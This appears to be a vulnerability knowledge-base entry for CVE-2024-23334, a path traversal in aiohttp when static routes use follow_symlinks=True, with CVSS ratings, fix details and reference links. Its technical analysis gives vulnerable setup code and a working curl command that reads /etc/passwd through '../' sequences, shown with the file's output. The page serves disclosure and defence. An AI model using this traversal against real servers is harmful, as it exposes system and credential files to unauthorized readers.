Description

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option ‘follow_symlinks’ can be used to determine whether to follow symbolic links outside the static root directory. When ‘follow_symlinks’ is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.

Add Assessment

cn-kali-team (4)

February 27, 2024 12:29pm UTC (8 months ago)•

Ratings

Attacker Value

High

Exploitability

Very High

Unauthenticated Vulnerable in uncommon configuration

Technical Analysis

CVE-2024-23334 Path Traversal

Environment Setup

Vulnerable code
pip install aiohttp==3.9.1

# examples/server_simple.py
from aiohttp import web

app = web.Application()
app.router.add_routes([
    web.static("/static", "static/", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability
])

if __name__ == '__main__':
    web.run_app(app)

# 访问 https://www.jetbrains.com/help/pycharm/ 获取 PyCharm 帮助

Execute following commands to start an aiohttp:3.9.1 ：

python main.py

Exploit

➜  CVE-2024-23334 git:(master) ✗ curl --path-as-is http://127.0.0.1:8080/static/../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

See More &1 replySee Less

abirfo (2) February 27, 2024 9:38pm UTC (8 months ago)•Edited 8 months ago

Hi brother how are you doing now please give me your explanation of the best way possible for me

abirfo (2)

February 27, 2024 9:36pm UTC (8 months ago)•Edited 8 months ago

Ratings

CISA KEV Listed Common in enterprise Difficult to patch Easy to weaponize Gives privileged access Observed in ransomware attacks Observed in state-sponsored attacks Unauthenticated Vulnerable in default configuration Authenticated Difficult to weaponize No useful access Requires elevated access Requires physical access Requires user interaction Vulnerable in uncommon configuration

Technical Analysis

www.google.com

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

7.5 High

Impact Score:

3.6

Exploitability Score:

3.9

Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

None

Availability (A):

None

Vendors

aiohttp,
fedoraproject

Products

aiohttp,
fedora 39

Exploited in the Wild

Reported by:

cn-kali-team indicated source as News Article or Blog (https://github.com/vulhub/vulhub/pull/501)

Reported: February 27, 2024 12:29pm UTC (8 months ago) • Edited 8 months ago

abirfo

Reported: February 27, 2024 9:36pm UTC (8 months ago)

References

Canonical

CVE-2024-23334 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23334)

Exploit

PoCs that have not been added by contributors directly have been sourced from: nomi-sec/PoC-in-GitHub.
A PoC added here by the AKB Worker must have at least 2 GitHub stars.

CVE-2024-23334-PoC (https://github.com/z3rObyte/CVE-2024-23334-PoC) (Added by AKB Worker)

CVE-2024-23334 (https://github.com/ox1111/CVE-2024-23334) (Added by AKB Worker)

CVE-2024-23334 (https://github.com/jhonnybonny/CVE-2024-23334) (Added by AKB Worker)

Miscellaneous

https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f

https://github.com/aio-libs/aiohttp/pull/8079

https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b

https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/

https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/

Rapid7

High

CVE-2024-23334

High

Very High

None

None

Network

CVE-2024-23334

Description

Add Assessment

Ratings

Technical Analysis

CVE-2024-23334 Path Traversal

Environment Setup

Exploit

Ratings

Technical Analysis

CVSS V3 Severity and Metrics

General Information

Vendors

Products

Exploited in the Wild

References

Canonical

Exploit

Miscellaneous

Additional Info

Technical Analysis

High

CVE-2024-23334

High

Very High

None

None

Network

CVE-2024-23334

Description

Add Assessment

Ratings

Technical Analysis

CVE-2024-23334 Path Traversal

Environment Setup

Exploit

Ratings

Technical Analysis

CVSS V3 Severity and Metrics

General Information

Vendors

Products

Exploited in the Wild

References

Canonical

Exploit

Miscellaneous

Additional Info

Technical Analysis

Quick Cookie Notification